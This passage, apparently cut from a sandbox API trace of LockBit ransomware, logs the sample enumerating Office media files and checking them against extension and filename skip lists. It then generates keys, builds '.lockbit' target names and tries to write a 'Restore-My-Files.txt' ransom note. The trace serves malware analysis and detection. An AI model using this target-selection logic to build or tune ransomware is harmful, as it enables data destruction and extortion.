hTemplateFile=0x0) returned 0x2a8 [0203.240] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.240] malloc (_Size=0x40068) returned 0x3df0008 [0203.240] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=267) returned 1 [0203.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.241] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.244] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.244] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.244] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.244] free (_Block=0x1fa2ed8) [0203.244] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.244] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.245] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.245] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fe4b700, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc92c1a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7fe4b700, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14580_.GIF", cAlternateFileName="")) returned 1 [0203.245] lstrcmpiW (lpString1=".", lpString2="BD14580_.GIF") returned -1 [0203.245] lstrcmpiW (lpString1="..", lpString2="BD14580_.GIF") returned -1 [0203.245] PathFindExtensionW (pszPath="BD14580_.GIF") returned=".GIF" [0203.245] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.245] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.245] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.246] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.246] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.246] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14580_.GIF") returned 1 [0203.246] lstrcmpiW (lpString1="ntldr", lpString2="BD14580_.GIF") returned 1 [0203.246] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14580_.GIF") returned 1 [0203.246] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14580_.GIF") returned 1 [0203.246] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14580_.GIF") returned -1 [0203.246] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14580_.GIF") returned 1 [0203.246] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14580_.GIF") returned 1 [0203.246] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.246] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF") returned=".GIF" [0203.246] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.246] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.246] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.246] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.246] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.247] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.247] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.247] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF.lockbit") returned 78 [0203.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14580_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.248] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.248] malloc (_Size=0x40068) returned 0x3df0008 [0203.249] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0203.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.249] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.253] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.253] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.253] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.253] free (_Block=0x1fa2ed8) [0203.253] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.253] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.253] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.253] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fe4b700, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc92c1a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7fe4b700, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14581_.GIF", cAlternateFileName="")) returned 1 [0203.253] lstrcmpiW (lpString1=".", lpString2="BD14581_.GIF") returned -1 [0203.253] lstrcmpiW (lpString1="..", lpString2="BD14581_.GIF") returned -1 [0203.253] PathFindExtensionW (pszPath="BD14581_.GIF") returned=".GIF" [0203.253] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.253] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.253] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.253] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.253] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.253] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.253] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.253] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.253] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.254] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.254] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14581_.GIF") returned 1 [0203.255] lstrcmpiW (lpString1="ntldr", lpString2="BD14581_.GIF") returned 1 [0203.255] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14581_.GIF") returned 1 [0203.255] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14581_.GIF") returned 1 [0203.255] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14581_.GIF") returned -1 [0203.255] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14581_.GIF") returned 1 [0203.255] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14581_.GIF") returned 1 [0203.255] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.255] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF") returned=".GIF" [0203.255] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.255] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.255] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.256] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.256] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.256] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.256] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.256] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.256] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF.lockbit") returned 78 [0203.256] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14581_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.257] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.257] malloc (_Size=0x40068) returned 0x3df0008 [0203.257] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=206) returned 1 [0203.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.258] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.263] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.263] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.263] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.263] free (_Block=0x1fa2ed8) [0203.263] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.263] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.263] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.263] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fe4b700, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc92c1a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7fe4b700, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14582_.GIF", cAlternateFileName="")) returned 1 [0203.263] lstrcmpiW (lpString1=".", lpString2="BD14582_.GIF") returned -1 [0203.263] lstrcmpiW (lpString1="..", lpString2="BD14582_.GIF") returned -1 [0203.264] PathFindExtensionW (pszPath="BD14582_.GIF") returned=".GIF" [0203.264] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.264] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.264] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 